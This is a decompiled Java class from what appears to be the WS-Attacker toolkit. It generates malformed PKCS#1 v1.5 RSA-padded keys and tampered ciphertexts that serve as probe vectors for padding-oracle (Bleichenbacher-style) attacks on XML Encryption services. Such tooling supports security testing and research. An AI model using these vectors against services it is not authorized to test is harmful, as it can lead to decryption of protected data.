/*
 * Decompiled with CFR 0.152.
 */
package wsattacker.library.xmlencryptionattack.attackengine.attacker.pkcs1;

import java.security.InvalidKeyException;
import java.security.NoSuchAlgorithmException;
import java.security.Provider;
import java.security.Security;
import java.security.cert.Certificate;
import java.security.interfaces.RSAPublicKey;
import java.util.Arrays;
import java.util.Random;
import javax.crypto.BadPaddingException;
import javax.crypto.Cipher;
import javax.crypto.IllegalBlockSizeException;
import javax.crypto.NoSuchPaddingException;
import org.apache.log4j.Logger;
import org.bouncycastle.jce.provider.BouncyCastleProvider;
import wsattacker.library.xmlencryptionattack.attackengine.CryptoAttackException;
import wsattacker.library.xmlencryptionattack.attackengine.Utility;
import wsattacker.library.xmlencryptionattack.attackengine.oracle.base.request.OracleRequest;
import wsattacker.library.xmlencryptionattack.attackengine.oracle.base.request.PKCS1OracleRequest;
import wsattacker.library.xmlencryptionattack.util.CryptoConstants;

public final class PKCS1VectorGenerator {
    private static Logger LOG = Logger.getLogger(PKCS1VectorGenerator.class);
    private static final int STATIC_VECTOR_SIZE = 11;

    private PKCS1VectorGenerator() {
    }

    public static OracleRequest[] generatePkcs1Vectors(Certificate cert, CryptoConstants.Algorithm algorithm, boolean setEncryptedData) throws CryptoAttackException {
        return PKCS1VectorGenerator.generatePkcs1Vectors((RSAPublicKey)cert.getPublicKey(), algorithm, setEncryptedData);
    }

    public static OracleRequest[] generatePkcs1Vectors(RSAPublicKey publicKey, CryptoConstants.Algorithm algorithm, boolean setEncryptedData) throws CryptoAttackException {
        Random random = new Random();
        byte[] keyBytes = new byte[algorithm.KEY_SIZE];
        random.nextBytes(keyBytes);
        LOG.debug((Object)("Generated a random symmetric key" + Utility.bytesToHex(keyBytes)));
        int rsaKeyLength = publicKey.getModulus().bitLength() / 8;
        int vectorSize = 11 + rsaKeyLength - 2;
        byte[][] plainPaddedKeys = new byte[vectorSize][];
        plainPaddedKeys[0] = PKCS1VectorGenerator.getEK_NoNullByte(rsaKeyLength, keyBytes);
        plainPaddedKeys[1] = PKCS1VectorGenerator.getEK_NullByteInPadding(rsaKeyLength, keyBytes);
        plainPaddedKeys[2] = PKCS1VectorGenerator.getEK_NullByteInPkcsPadding(rsaKeyLength, keyBytes);
        plainPaddedKeys[3] = PKCS1VectorGenerator.getEK_SymmetricKeyOfSize16(rsaKeyLength, keyBytes);
        plainPaddedKeys[4] = PKCS1VectorGenerator.getEK_SymmetricKeyOfSize24(rsaKeyLength, keyBytes);
        plainPaddedKeys[5] = PKCS1VectorGenerator.getEK_SymmetricKeyOfSize32(rsaKeyLength, keyBytes);
        plainPaddedKeys[6] = PKCS1VectorGenerator.getEK_SymmetricKeyOfSize40(rsaKeyLength, keyBytes);
        plainPaddedKeys[7] = PKCS1VectorGenerator.getEK_SymmetricKeyOfSize8(rsaKeyLength, keyBytes);
        plainPaddedKeys[8] = PKCS1VectorGenerator.getEK_WrongFirstByte(rsaKeyLength, keyBytes);
        plainPaddedKeys[9] = PKCS1VectorGenerator.getEK_WrongSecondByte(rsaKeyLength, keyBytes);
        plainPaddedKeys[10] = PKCS1VectorGenerator.getPaddedKey(rsaKeyLength, keyBytes);
        byte[][] additionalPaddedKeys = PKCS1VectorGenerator.getEK_DifferentPositionsOf0x00(rsaKeyLength, keyBytes);
        System.arraycopy(additionalPaddedKeys, 0, plainPaddedKeys, 11, additionalPaddedKeys.length);
        try {
            Security.addProvider((Provider)new BouncyCastleProvider());
            Cipher rsa = Cipher.getInstance("RSA/NONE/NoPadding");
            rsa.init(1, publicKey);
            byte[][] encryptedKeys = new byte[vectorSize][];
            for (int i = 0; i < encryptedKeys.length; ++i) {
                encryptedKeys[i] = rsa.doFinal(plainPaddedKeys[i]);
            }
            OracleRequest[] requests = null;
            if (setEncryptedData) {
                byte[][] encryptedData = PKCS1VectorGenerator.getEncryptedSymmetricData(keyBytes, algorithm);
                requests = new OracleRequest[encryptedKeys.length * encryptedData.length];
                for (int i = 0; i < encryptedKeys.length; ++i) {
                    for (int j = 0; j < encryptedData.length; ++j) {
                        requests[i * encryptedData.length + j] = new PKCS1OracleRequest(encryptedKeys[i], encryptedData[j]);
                    }
                }
            } else {
                requests = new OracleRequest[encryptedKeys.length];
                for (int i = 0; i < requests.length; ++i) {
                    requests[i] = new PKCS1OracleRequest(encryptedKeys[i]);
                }
            }
            return requests;
        }
        catch (InvalidKeyException | NoSuchAlgorithmException | BadPaddingException | IllegalBlockSizeException | NoSuchPaddingException ex) {
            throw new CryptoAttackException(ex);
        }
    }

    private static byte[][] getEncryptedSymmetricData(byte[] key, CryptoConstants.Algorithm algorithm) throws CryptoAttackException {
        byte[][] encryptedData = new byte[][]{Utility.encryptSymmetricData("<test/>".getBytes(), key, algorithm), Utility.encryptSymmetricData("<test>".getBytes(), key, algorithm), Utility.encryptSymmetricData("".getBytes(), key, algorithm), Utility.encryptSymmetricData("jlfsjl<js&".getBytes(), key, algorithm)};
        byte[] byArray = encryptedData[3];
        int n = algorithm.BLOCK_SIZE - 1;
        byArray[n] = (byte)(byArray[n] ^ 0x50);
        return encryptedData;
    }

    private static byte[] getPaddedKey(int rsaKeyLength, byte[] symmetricKey) {
        byte[] key = new byte[rsaKeyLength];
        Arrays.fill(key, (byte)42);
        key[0] = 0;
        key[1] = 2;
        key[rsaKeyLength - symmetricKey.length - 1] = 0;
        System.arraycopy(symmetricKey, 0, key, rsaKeyLength - symmetricKey.length, symmetricKey.length);
        return key;
    }

    private static byte[] getEK_WrongFirstByte(int rsaKeyLength, byte[] symmetricKey) {
        byte[] key = PKCS1VectorGenerator.getPaddedKey(rsaKeyLength, symmetricKey);
        key[0] = 23;
        LOG.debug((Object)("Generated a PKCS1 padded message with a wrong first byte: " + Utility.bytesToHex(key)));
        return key;
    }

    private static byte[] getEK_WrongSecondByte(int rsaKeyLength, byte[] symmetricKey) {
        byte[] key = PKCS1VectorGenerator.getPaddedKey(rsaKeyLength, symmetricKey);
        key[1] = 23;
        LOG.debug((Object)("Generated a PKCS1 padded message with a wrong second byte: " + Utility.bytesToHex(key)));
        return key;
    }

    private static byte[] getEK_NoNullByte(int rsaKeyLength, byte[] symmetricKey) {
        byte[] key = PKCS1VectorGenerator.getPaddedKey(rsaKeyLength, symmetricKey);
        for (int i = 3; i < key.length; ++i) {
            if (key[i] != 0) continue;
            key[i] = 1;
        }
        LOG.debug((Object)("Generated a PKCS1 padded message with no separating byte: " + Utility.bytesToHex(key)));
        return key;
    }

    private static byte[] getEK_NullByteInPkcsPadding(int rsaKeyLength, byte[] symmetricKey) {
        byte[] key = PKCS1VectorGenerator.getPaddedKey(rsaKeyLength, symmetricKey);
        key[3] = 0;
        LOG.debug((Object)("Generated a PKCS1 padded message with a 0x00 byte in the PKCS1 padding: " + Utility.bytesToHex(key)));
        return key;
    }

    private static byte[] getEK_NullByteInPadding(int rsaKeyLength, byte[] symmetricKey) {
        byte[] key = PKCS1VectorGenerator.getPaddedKey(rsaKeyLength, symmetricKey);
        key[11] = 0;
        LOG.debug((Object)("Generated a PKCS1 padded message with a 0x00 byte in padding: " + Utility.bytesToHex(key)));
        return key;
    }

    private static byte[] getEK_SymmetricKeyOfSize40(int rsaKeyLength, byte[] symmetricKey) {
        byte[] key = PKCS1VectorGenerator.getPaddedKey(rsaKeyLength, symmetricKey);
        key[rsaKeyLength - 40 - 1] = 0;
        LOG.debug((Object)("Generated a PKCS1 padded symmetric key of size 40: " + Utility.bytesToHex(key)));
        return key;
    }

    private static byte[] getEK_SymmetricKeyOfSize32(int rsaKeyLength, byte[] symmetricKey) {
        byte[] key = PKCS1VectorGenerator.getPaddedKey(rsaKeyLength, symmetricKey);
        for (int i = 3; i < key.length; ++i) {
            if (key[i] != 0) continue;
            key[i] = 1;
        }
        key[rsaKeyLength - 32 - 1] = 0;
        LOG.debug((Object)("Generated a PKCS1 padded symmetric key of size 32: " + Utility.bytesToHex(key)));
        return key;
    }

    private static byte[] getEK_SymmetricKeyOfSize24(int rsaKeyLength, byte[] symmetricKey) {
        byte[] key = PKCS1VectorGenerator.getPaddedKey(rsaKeyLength, symmetricKey);
        for (int i = 3; i < key.length; ++i) {
            if (key[i] != 0) continue;
            key[i] = 1;
        }
        key[rsaKeyLength - 24 - 1] = 0;
        LOG.debug((Object)("Generated a PKCS1 padded symmetric key of size 24: " + Utility.bytesToHex(key)));
        return key;
    }

    private static byte[] getEK_SymmetricKeyOfSize16(int rsaKeyLength, byte[] symmetricKey) {
        byte[] key = PKCS1VectorGenerator.getPaddedKey(rsaKeyLength, symmetricKey);
        for (int i = 3; i < key.length; ++i) {
            if (key[i] != 0) continue;
            key[i] = 1;
        }
        key[rsaKeyLength - 16 - 1] = 0;
        LOG.debug((Object)("Generated a PKCS1 padded symmetric key of size 16: " + Utility.bytesToHex(key)));
        return key;
    }

    private static byte[] getEK_SymmetricKeyOfSize8(int rsaKeyLength, byte[] symmetricKey) {
        byte[] key = PKCS1VectorGenerator.getPaddedKey(rsaKeyLength, symmetricKey);
        for (int i = 3; i < key.length; ++i) {
            if (key[i] != 0) continue;
            key[i] = 1;
        }
        key[rsaKeyLength - 8 - 1] = 0;
        LOG.debug((Object)("Generated a PKCS1 padded symmetric key of size 8: " + Utility.bytesToHex(key)));
        return key;
    }

    private static byte[][] getEK_DifferentPositionsOf0x00(int rsaKeyLength, byte[] symmetricKey) {
        byte[][] result = new byte[rsaKeyLength - 2][];
        for (int i = 2; i < rsaKeyLength; ++i) {
            byte[] key = PKCS1VectorGenerator.getPaddedKey(rsaKeyLength, symmetricKey);
            for (int j = 3; j < key.length; ++j) {
                if (key[j] != 0) continue;
                key[j] = 1;
            }
            result[i - 2] = key;
            result[i - 2][i] = 0;
        }
        return result;
    }
}

